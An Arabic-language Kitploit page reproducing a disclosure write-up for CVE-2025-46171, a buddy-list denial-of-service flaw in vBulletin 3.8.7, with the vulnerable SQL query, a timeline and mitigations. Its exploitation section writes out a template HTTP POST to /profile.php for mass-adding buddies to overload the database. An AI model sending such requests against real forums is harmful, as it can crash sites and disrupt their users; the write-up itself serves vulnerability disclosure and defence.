Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-46171 — كتابة عن ثغرة حرمان من الخدمة في قائمة الأصدقاء لـ vBulletin 3.8.7. | Kitploit
أدوات/GitHubGitHub/oiyl/cve-2025-46171
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقسوء التكوينأمن قواعد البياناتArchived
GitHuboiyl/cve-2025-46171

CVE-2025-46171

كتابة عن ثغرة حرمان من الخدمة في قائمة الأصدقاء لـ vBulletin 3.8.7.

عرض المستودع
45منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

vBulletin 3.x.x - تعطيل الخدمة عبر إثقال قائمة الأصدقاء

ملخص

يقوم نقطة النهاية /misc.php?do=buddylist بتنفيذ استعلام JOIN واحد كبير يسترجع جميع الأصدقاء مع معلومات المستخدم والجلسة الخاصة بهم للتحقق من الحالة المتصلة. نظرًا لأن هذا الاستعلام يعالج قائمة الأصدقاء بأكملها دون ترقيم أو حدود للنتائج، فإنه يصبح مكلفًا جدًا للموارد ويمكن أن يُثقل قاعدة البيانات عندما تكبر القائمة.

هذه المشكلة سهلة الاستغلال وتتطلب إعدادًا بسيطًا. لا حاجة لأي صلاحيات خاصة تتجاوز حساب المستخدم الأساسي. مجرد تضخيم قائمة الأصدقاء يكفي لوضع ضغط كبير على قاعدة البيانات.

الإصدارات المتأثرة

  • ✅ تم تأكيد الثغرة: vBulletin 3.8.7

التفاصيل الفنية

يقوم استعلام SQL هذا باسترجاع تفاصيل الأصدقاء مع معلومات الجلسة للتحقق من الحالة المتصلة لكل صديق. نظرًا لأنه يعالج قائمة الأصدقاء بأكملها ويجمعها مع بيانات الجلسة لكل إدخال، يصبح الاستعلام كبيرًا جدًا ومكلفًا للموارد.

root@kitploit:~
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");

الجدول الزمني

  • 17 أبريل 2025: اكتشاف الثغرة
  • 18 أبريل 2025: تقديم طلب CVE إلى MITRE
  • 29 مايو 2025: تعيين CVE-2025-46171
  • 27 يونيو 2025: الإفصاح العام

الاستغلال

إضافة أصدقاء جماعيين

يمكن ملء قوائم الأصدقاء بشكل جماعي عن طريق إرسال POST إلى /profile.php باستخدام listbits. يمكن تكرار ذلك لآلاف معرفات المستخدمين لتضخيم قائمة الأصدقاء:

root@kitploit:~
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...

التأثير

في المنتديات الكبيرة، يمكن أن يتسبب ذلك في تأخر استعلامات شديد أو تعطل مثيل MySQL بالكامل.

التخفيف:

  • تطبيق ترقيم الاستعلام أو تحديد عدد إدخالات الأصدقاء المسترجعة لكل طلب
  • تطبيق تحديد المعدل والتحقق من صحة تعديلات قائمة الأصدقاء
تنزيل الأداة